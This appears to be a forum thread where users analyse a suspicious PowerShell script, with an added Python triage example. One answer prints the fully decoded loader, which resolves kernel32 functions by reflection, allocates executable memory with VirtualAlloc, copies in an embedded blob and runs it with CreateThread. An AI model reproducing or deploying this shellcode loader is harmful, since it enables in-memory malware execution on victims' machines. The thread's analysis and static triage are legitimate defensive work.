Is this PowerShell script an infection?

It decompresses just fine for me... I converted the Base64 string into binary, then ran gunzip on it (I am using a Linux system here). This results in another piece of PowerShell that does things which can only be considered as definitely fishy. It contains a piece of 450 bytes that it loads into (native) RAM and runs as code. I am way too lazy to disassemble the piece of code, but I feel pretty safe when I say that this piece of code is not safe at all.

Looks like there is some malware in your machine that tries to gain some privileges. It's time for some nuking, I'd say.


Posting this in an answer, because it's too big for a comment: I don't know what it does (though it does look sketchy) but here's the expansion. It's a PS script itself, of course:

# Resolves the address of an exported function ($zfOqpP8) in a loaded module ($hVrV8B2fWj)
# by calling GetModuleHandle and GetProcAddress through reflection on System.dll.
function t2Mj {
    Param ($hVrV8B2fWj, $zfOqpP8)
    $mJnysoxSPX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

    return $mJnysoxSPX.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mJnysoxSPX.GetMethod('GetModuleHandle')).Invoke($null, @($hVrV8B2fWj)))), $zfOqpP8))
}

# Builds a delegate type in memory at run time for the given parameter types and return type.
function j1G8vwsPg {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $srs_LF,
        [Parameter(Position = 1)] [Type] $lTMpjL3Mn = [Void]
    )

    $b0pq = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $b0pq.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $srs_LF).SetImplementationFlags('Runtime, Managed')
    $b0pq.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $lTMpjL3Mn, $srs_LF).SetImplementationFlags('Runtime, Managed')

    return $b0pq.CreateType()
}

# Embedded Base64 blob: the bytes that are copied into the allocated memory below.
[Byte[]]$wgOO3l = [System.Convert]::FromBase64String("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")

# VirtualAlloc(NULL, length, 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE), then copy the blob in.
$zk1lmz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll VirtualAlloc), (j1G8vwsPg @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $wgOO3l.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($wgOO3l, 0, $zk1lmz, $wgOO3l.length)

# CreateThread with the allocated buffer as start address, then WaitForSingleObject(thread, 0xffffffff = INFINITE).
$oFpHGWmDM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll CreateThread), (j1G8vwsPg @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zk1lmz,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll WaitForSingleObject), (j1G8vwsPg @([IntPtr], [Int32]))).Invoke($oFpHGWmDM,0xffffffff) | Out-Null

Definitely looks questionable. I don't recognize it, though.
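
The unwrapping described in the first answer (Base64, then gunzip) together with a static check for the API names visible in the expanded script, as an added Python example that is not part of either answer. The function names, the 1 MiB cap and the sample input are assumptions made here; the sample is constructed and inert, and nothing is executed.

```python
import base64
import gzip
import io
import re

MAX_OUT = 1 << 20  # assumed cap: refuse to inflate more than 1 MiB per layer

# Names from the expanded script above that mark in-memory native code execution.
INDICATORS = ("VirtualAlloc", "CreateThread", "GetProcAddress",
              "GetDelegateForFunctionPointer", "DefineDynamicAssembly")

def unwrap_layer(b64_text: str) -> str:
    """Base64-decode and gunzip one layer; return the text without running it."""
    raw = base64.b64decode("".join(b64_text.split()), validate=True)
    if raw[:2] != b"\x1f\x8b":  # gzip magic bytes
        raise ValueError("not a gzip stream")
    with gzip.GzipFile(fileobj=io.BytesIO(raw)) as gz:
        out = gz.read(MAX_OUT + 1)
    if len(out) > MAX_OUT:
        raise ValueError("decompressed layer exceeds size cap")
    return out.decode("utf-8", errors="replace")

def triage(script: str) -> dict:
    """Report which indicators occur and the decoded size of each embedded blob."""
    hits = [name for name in INDICATORS if name in script]
    blobs = re.findall(
        r'FromBase64String\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)', script)
    sizes = []
    for blob in blobs:
        try:
            sizes.append(len(base64.b64decode(blob, validate=True)))
        except ValueError:  # malformed Base64: record it rather than crash
            sizes.append(-1)
    return {"indicators": hits, "blob_sizes": sizes}

def make_sample() -> str:
    """Constructed sample: 16 zero bytes stand in for the native blob."""
    inner_blob = base64.b64encode(bytes(16)).decode()
    inner = ('[Byte[]]$b = [System.Convert]::FromBase64String("%s")\n'
             '# t2Mj kernel32.dll VirtualAlloc ... CreateThread\n' % inner_blob)
    return base64.b64encode(gzip.compress(inner.encode())).decode()

if __name__ == "__main__":
    print(triage(unwrap_layer(make_sample())))
```

Run against the real outer string, the blob size reported should match the byte count the first answer mentions, which is a quick sanity check that the layer was unwrapped correctly.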